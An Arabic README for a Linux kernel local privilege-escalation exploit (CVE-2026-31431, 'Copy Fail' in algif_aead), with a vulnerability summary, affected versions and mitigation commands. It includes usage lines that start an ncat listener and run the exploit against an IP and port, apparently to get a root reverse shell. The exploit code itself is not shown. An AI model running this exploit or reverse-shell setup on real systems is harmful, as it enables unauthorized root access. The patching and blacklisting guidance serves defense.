
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2026-31431، وهي خلل منطقي في نواة لينكس AF_ALG يسمح للمستخدمين غير المصرح لهم بكتابة 4 بايتات في ذاكرة التخزين المؤقت للصفحات والحصول على صلاحيات الجذر. يتضمن سكربت إثبات المفهوم (PoC) وإرشادات التخفيف.
Copy Fail هي ثغرة رفع صلاحيات محلية (LPE) عالية الخطورة في النظام الفرعي للتشفير في نواة لينكس (algif_aead). تم اكتشافها والإفصاح عنها بواسطة Theori (عبر أداة أبحاث الثغرات المدعومة بالذكاء الاصطناعي Xint Code) في 29 أبريل 2026. تسمح هذه الثغرة لأي مستخدم محلي غير مميز بكتابة 4 بايتات مُتحكم بها في ذاكرة التخزين المؤقت للصفحات (page cache) لأي ملف قابل للقراءة — واستغلال ذلك للحصول على صلاحيات الجذر على جميع توزيعات لينكس الرئيسية تقريبًا التي صدرت منذ 2017.
استغلال إثبات المفهوم العامل يبلغ حجمه ~732 بايت فقط من بايثون.
sudo ncat -lvnp PORT
# باستخدام سكربت بايثون
python3 CVE-2026-31431-Exploit.py IP PORT
# ثنائي مُجمّع
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
AF_ALG وربطه بـ authencesn(hmac(sha256),cbc(aes))بشكل أساسي، جميع توزيعات لينكس الرئيسية الصادرة منذ 2017 متأثرة.
قم بتحديث نواتك إلى إصدار يحتوي على commit الإصلاح fafe0fa2995a. معظم التوزيعات الرئيسية أصدرت أو تصدر حزم نواة محدّثة.
إذا لم تتمكن من التصحيح فورًا:
algif_aead النمطية:
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
هذا المستودع لأغراض تعليمية ودفاعية فقط. المعلومات الواردة هنا تهدف إلى مساعدة فرق الأمن على فهم واكتشاف وتخفيف CVE-2026-31431. التزم دائمًا بممارسات الإفصاح المسؤول والقوانين المعمول بها.
| الحقل | التفاصيل |
|---|
| معرف CVE | CVE-2026-31431 |
| درجة CVSS | 7.8 (عالية) |
| النوع | رفع صلاحيات محلي (LPE) |
| المكوّن | algif_aead — واجهة التشفير AF_ALG للمستخدم في نواة لينكس |
| السبب الجذري | خلل منطقي في قالب AEAD authencesn؛ تحسين في المكان (commit 72548b093ee3، أغسطس 2017) يتسبب في ظهور صفحات ذاكرة التخزين المؤقت في قائمة التشتت القابلة للكتابة للنواة |
| الأولية | كتابة مُتحكم بها من 4 بايتات في ذاكرة التخزين المؤقت للصفحات لأي ملف قابل للقراءة |
| آلية الاستغلال | مقبس AF_ALG ← splice() ← إفساد ذاكرة التخزين المؤقت لثنائي setuid ← الجذر |
| حالة سباق؟ | ❌ لا — خلل منطقي مباشر، موثوق 100% |
| هل يلزم إزاحة النواة؟ | ❌ لا |
| commit الإصلاح | fafe0fa2995a (يلغي تحسين 2017) |
| متأثرة | غير متأثرة |
|---|
| نواة لينكس 4.14 حتى 7.0-rc | النوى قبل 4.14 (قبل commit أغسطس 2017) |
| جميع 6.18.x قبل 6.18.22 | 6.18.22+ (مُصححة) |
| جميع 6.19.x قبل 6.19.12 | 6.19.12+ (مُصححة) |